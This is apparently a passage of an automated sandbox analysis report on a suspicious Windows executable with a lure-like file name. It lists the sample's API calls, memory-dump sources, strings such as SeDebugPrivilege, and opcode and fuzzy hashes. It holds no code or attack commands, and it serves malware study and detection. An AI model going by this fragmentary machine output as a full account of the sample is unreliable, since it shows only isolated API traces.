                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$_memset
                                          • String ID: ,,$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                          • API String ID: 2862541840-218231672
                                          • Opcode ID: 3770c82e82f8d666bad64e1c9330c792eb6588c509d613c40e3a7312fc14c5ce
                                          • Instruction ID: e093dff0d5ff10df47372bd0e997eec4c6a466e12a12f95ac7af41b055157d10
                                          • Opcode Fuzzy Hash: 3770c82e82f8d666bad64e1c9330c792eb6588c509d613c40e3a7312fc14c5ce
                                          • Instruction Fuzzy Hash: 2A91CC70A40309ABCF24DFA5E848FAEBBB8EF85354F109019F519BB281D7709945CFA0
                                          APIs
                                          • EnumChildWindows.USER32(?,00E4AA64), ref: 00E4A9A2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ChildEnumWindows
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 3555792229-1603158881
                                          • Opcode ID: d8adee4a2328fbac88ce3e54f6e5a1509a451d3cee5775974f9740e54f05c76d
                                          • Instruction ID: 643841173d90d385a55cce06f3297face542a41414df7dd8cdc96d8a931fa148
                                          • Opcode Fuzzy Hash: d8adee4a2328fbac88ce3e54f6e5a1509a451d3cee5775974f9740e54f05c76d
                                          • Instruction Fuzzy Hash: 8191E970940206EBDB18DF60E481BE9F7B4FF44314F59A129E989B7181DF307999CBA1
                                          APIs
                                          • SetWindowLongW.USER32(?,000000EB), ref: 00DF2EAE
                                            • Part of subcall function 00DF1DB3: GetClientRect.USER32(?,?), ref: 00DF1DDC
                                            • Part of subcall function 00DF1DB3: GetWindowRect.USER32(?,?), ref: 00DF1E1D
                                            • Part of subcall function 00DF1DB3: ScreenToClient.USER32(?,?), ref: 00DF1E45
                                          • GetDC.USER32 ref: 00E2CF82
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E2CF95
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E2CFA3
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E2CFB8
                                          • ReleaseDC.USER32(?,00000000), ref: 00E2CFC0
                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E2D04B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                          • String ID: U
                                          • API String ID: 4009187628-3372436214
                                          • Opcode ID: 6cce727b6d6b0dffd28dbae8b335f6a547a2efd47ba52956dc17fb304d0d5244
                                          • Instruction ID: 1cfe1f4a451527800695ccdd9850f8b30afc2095372f4ee864cdfd1e402b173e
                                          • Opcode Fuzzy Hash: 6cce727b6d6b0dffd28dbae8b335f6a547a2efd47ba52956dc17fb304d0d5244
                                          • Instruction Fuzzy Hash: DB71D331504209DFCF21CF64DC84ABA7BB6FF48314F28926AFE55AA1A5C7318C85DB60
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E7F910), ref: 00E6903D
                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E7F910), ref: 00E69071
                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E691EB
                                          • SysFreeString.OLEAUT32(?), ref: 00E69215
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                          • String ID:
                                          • API String ID: 560350794-0
                                          • Opcode ID: ac5714ed2c6ac0c6170080bbeed8b7ecd91c166f99daeb1d25158222bf9a2f23
                                          • Instruction ID: 9fcfcabfad53d6bba69537dbd41d5017a8484ae05e988a57add1e77d35b15a8b
                                          • Opcode Fuzzy Hash: ac5714ed2c6ac0c6170080bbeed8b7ecd91c166f99daeb1d25158222bf9a2f23
                                          • Instruction Fuzzy Hash: D0F13971A40209EFDF04DF94D888EAEB7B9FF49354F108059F915AB291DB31AE45CB60
                                          APIs
                                          • _memset.LIBCMT ref: 00E6F9C9
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E6FB5C
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E6FB80
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E6FBC0
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E6FBE2
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E6FD5E
                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E6FD90
                                          • CloseHandle.KERNEL32(?), ref: 00E6FDBF
                                          • CloseHandle.KERNEL32(?), ref: 00E6FE36
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                          • String ID:
                                          • API String ID: 4090791747-0
                                          • Opcode ID: faa143088d41399c49255c7406d00c82cbbea3bb182e94f1f07bf60af0d725be
                                          • Instruction ID: 96765d7943b9a8f47a136f2f56827b6587af4a4c209df360a4abbdc3c0cfbdf1
                                          • Opcode Fuzzy Hash: faa143088d41399c49255c7406d00c82cbbea3bb182e94f1f07bf60af0d725be
                                          • Instruction Fuzzy Hash: F5E1E631644301DFC714EF24E491B6ABBE1EF84354F14986DF999AB2A2CB31EC45CB52
                                          APIs
                                            • Part of subcall function 00E548AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E538D3,?), ref: 00E548C7
                                            • Part of subcall function 00E548AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E538D3,?), ref: 00E548E0
                                            • Part of subcall function 00E54CD3: GetFileAttributesW.KERNEL32(?,00E53947), ref: 00E54CD4
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00E54FE2
                                          • _wcscmp.LIBCMT ref: 00E54FFC
                                          • MoveFileW.KERNEL32(?,?), ref: 00E55017
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                          • String ID:
                                          • API String ID: 793581249-0
                                          • Opcode ID: 4f9fe8b58c5c83e553e61cbdb667b7333762885ef9b5522bf23e3d5480b83b63
                                          • Instruction ID: 33b0da416cb8ffc5b70c2b13b32ee5976908729b0b40ee6627f23060fd8266ce
                                          • Opcode Fuzzy Hash: 4f9fe8b58c5c83e553e61cbdb667b7333762885ef9b5522bf23e3d5480b83b63
                                          • Instruction Fuzzy Hash: 725174B21087849BC724DB60DC819DFB3ECAF84305F005D2EF689E3191EE74A28C8766
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E7896E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: 3b2f0d7b6024c427df0262aa1b86d8f8a6d2aa98dc550b0d5ee319a613cacf26
                                          • Instruction ID: b8387202df98666a61181846fa005a2bc997c2c4e636ca0b656cf54cd61aa9b2
                                          • Opcode Fuzzy Hash: 3b2f0d7b6024c427df0262aa1b86d8f8a6d2aa98dc550b0d5ee319a613cacf26
                                          • Instruction Fuzzy Hash: D851A430580208BFEF24DF29CD8DBA93B65FB24354F509122F61DF61A1DF71A98097A2
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E2C547
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E2C569
                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E2C581
                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E2C59F
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E2C5C0
                                          • DestroyIcon.USER32(00000000), ref: 00E2C5CF
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E2C5EC
                                          • DestroyIcon.USER32(?), ref: 00E2C5FB
                                            • Part of subcall function 00E7A71E: DeleteObject.GDI32(00000000), ref: 00E7A757
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                          • String ID:
                                          • API String ID: 2819616528-0
                                          • Opcode ID: 857de070d30590ec3a8d1986214ee8c311596191ac2e1c2f3213d611012f7b57
                                          • Instruction ID: 0f5e6a50e9cd090ad92c28a94750c92d97d523ab0cb07e33830bbe4703da6c26
                                          • Opcode Fuzzy Hash: 857de070d30590ec3a8d1986214ee8c311596191ac2e1c2f3213d611012f7b57
                                          • Instruction Fuzzy Hash: 7E516870A40209AFDB24DF25DC45BBA37B5EB58714F218528FA46A72A0DB70ED90DB60
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E48A84,00000B00,?,?), ref: 00E48E0C
                                          • HeapAlloc.KERNEL32(00000000,?,00E48A84,00000B00,?,?), ref: 00E48E13
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E48A84,00000B00,?,?), ref: 00E48E28
                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00E48A84,00000B00,?,?), ref: 00E48E30
                                          • DuplicateHandle.KERNEL32(00000000,?,00E48A84,00000B00,?,?), ref: 00E48E33
                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E48A84,00000B00,?,?), ref: 00E48E43
                                          • GetCurrentProcess.KERNEL32(00E48A84,00000000,?,00E48A84,00000B00,?,?), ref: 00E48E4B
                                          • DuplicateHandle.KERNEL32(00000000,?,00E48A84,00000B00,?,?), ref: 00E48E4E
                                          • CreateThread.KERNEL32(00000000,00000000,00E48E74,00000000,00000000,00000000), ref: 00E48E68
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                          • String ID:
                                          • API String ID: 1957940570-0
                                          • Opcode ID: 956c95e4ff57529862a4383c6cbedf1ccac1fe77d72431185bcab088a3f40106
                                          • Instruction ID: 95078be10721af3afa447870d8b33518b8c6d26d688044fd11ab4d16c1ce9e26
                                          • Opcode Fuzzy Hash: 956c95e4ff57529862a4383c6cbedf1ccac1fe77d72431185bcab088a3f40106
                                          • Instruction Fuzzy Hash: 4A01AC75641344FFE610EB65DC49F5B3B6CEB89711F404421FA09EB1A2CA70D8448A20
                                          APIs
                                            • Part of subcall function 00E47652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?,?,00E4799D), ref: 00E4766F
                                            • Part of subcall function 00E47652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?), ref: 00E4768A
                                            • Part of subcall function 00E47652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?), ref: 00E47698
                                            • Part of subcall function 00E47652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?), ref: 00E476A8
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00E69B1B
                                          • _memset.LIBCMT ref: 00E69B28
                                          • _memset.LIBCMT ref: 00E69C6B
                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00E69C97
                                          • CoTaskMemFree.OLE32(?), ref: 00E69CA2
                                          Strings
                                          • NULL Pointer assignment, xrefs: 00E69CF0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                          • String ID: NULL Pointer assignment
                                          • API String ID: 1300414916-2785691316
                                          • Opcode ID: cac042abbc453dee980c37b82198c80d73835aa46fea3a5c602ea408c72502e8
                                          • Instruction ID: 158eaf96d9b84ca39244f9b947160c214a41e127089a83a9d367588007e7bec4
                                          • Opcode Fuzzy Hash: cac042abbc453dee980c37b82198c80d73835aa46fea3a5c602ea408c72502e8
                                          • Instruction Fuzzy Hash: AA912971D00219ABDF10DFA5EC85AEEBBB9EF08750F208169F519B7241DB716A44CFA0
                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E77093
                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00E770A7
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E770C1
                                          • _wcscat.LIBCMT ref: 00E7711C
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E77133
                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E77161
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window_wcscat
                                          • String ID: SysListView32
                                          • API String ID: 307300125-78025650
                                          • Opcode ID: 90aab2dcd606867b5f1f1bfed4d0de565e6989aaf771610a2e48c6eacc51b8d8
                                          • Instruction ID: 0379217f8f8396f4ad8b88616dac42e26f6c4287778f96a4ac21018c175f964f
                                          • Opcode Fuzzy Hash: 90aab2dcd606867b5f1f1bfed4d0de565e6989aaf771610a2e48c6eacc51b8d8
                                          • Instruction Fuzzy Hash: 8C419171A04308AFDB21DFA4CC85BEE77E8EF08754F10556AF588B7192D6719D848B60
                                          APIs
                                            • Part of subcall function 00E53E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00E53EB6
                                            • Part of subcall function 00E53E91: Process32FirstW.KERNEL32(00000000,?), ref: 00E53EC4
                                            • Part of subcall function 00E53E91: CloseHandle.KERNEL32(00000000), ref: 00E53F8E
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E6ECB8
                                          • GetLastError.KERNEL32 ref: 00E6ECCB
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E6ECFA
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E6ED77
                                          • GetLastError.KERNEL32(00000000), ref: 00E6ED82
                                          • CloseHandle.KERNEL32(00000000), ref: 00E6EDB7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2533919879-2896544425
                                          • Opcode ID: 12f7e5b275b4821e7573043c34ebc47d960a711b3c816163f1e61fdea540403f
                                          • Instruction ID: 6472f89567213fd3bd0bca663b116bcbaad1efb1c165a892e98e617b62b1731b
                                          • Opcode Fuzzy Hash: 12f7e5b275b4821e7573043c34ebc47d960a711b3c816163f1e61fdea540403f
                                          • Instruction Fuzzy Hash: 8E41BC712402019FDB20EF24DC95F7EB7E1AF40754F088419F946AB3C2DB75A858CBA2
                                          APIs
                                          • LoadIconW.USER32(00000000,00007F03), ref: 00E532C5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          • Opcode ID: caf1bff236912a8932704573cb614573667ea85a1a81b3b2238c8bc62c2373a9
                                          • Instruction ID: 122c745168f9758c246a3909b1bf65cae56283d935ed464cea4b2e800fceab22
                                          • Opcode Fuzzy Hash: caf1bff236912a8932704573cb614573667ea85a1a81b3b2238c8bc62c2373a9
                                          • Instruction Fuzzy Hash: B4112739309746BBE7015A74DC42DFAB3DCEF1A3B5F20242AFD00BA191E7A16B8445B5
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E5454E
                                          • LoadStringW.USER32(00000000), ref: 00E54555
                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E5456B
                                          • LoadStringW.USER32(00000000), ref: 00E54572
                                          • _wprintf.LIBCMT ref: 00E54598
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E545B6
                                          Strings
                                          • %s (%d) : ==> %s: %s %s, xrefs: 00E54593
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wprintf
                                          • String ID: %s (%d) : ==> %s: %s %s
                                          • API String ID: 3648134473-3128320259
                                          • Opcode ID: 2b3d369e285513746758b268f54b386eb19d11bf197d1df828022bac9d58607b
                                          • Instruction ID: e2b6417057ec81b4189108e7c72aac19c4633a6c85617286bf1a5159a95fd857
                                          • Opcode Fuzzy Hash: 2b3d369e285513746758b268f54b386eb19d11bf197d1df828022bac9d58607b
                                          • Instruction Fuzzy Hash: 9F014FF2900208BFE750E7E19D89EE6776CE708301F4005A5FB49F2052EA749EC98B70
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • GetSystemMetrics.USER32(0000000F), ref: 00E7D78A
                                          • GetSystemMetrics.USER32(0000000F), ref: 00E7D7AA
                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E7D9E5
                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E7DA03
                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E7DA24
                                          • ShowWindow.USER32(00000003,00000000), ref: 00E7DA43
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00E7DA68
                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00E7DA8B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                          • String ID:
                                          • API String ID: 1211466189-0
                                          • Opcode ID: cf67719f4a92d5544042d766a1987a2480f0e0afa9a6295e3a0fd10142d60a5a
                                          • Instruction ID: 9bb7dc9c01c72ee3b93ace8303f504280a911d4a0ed81845ea418f072d6b9da8
                                          • Opcode Fuzzy Hash: cf67719f4a92d5544042d766a1987a2480f0e0afa9a6295e3a0fd10142d60a5a
                                          • Instruction Fuzzy Hash: E7B1BA31604215EFDF18CF69C985BBD7BB1BF44714F08D069ED88AB295D734A990CB60
                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E2C417,00000004,00000000,00000000,00000000), ref: 00DF2ACF
                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E2C417,00000004,00000000,00000000,00000000,000000FF), ref: 00DF2B17
                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E2C417,00000004,00000000,00000000,00000000), ref: 00E2C46A
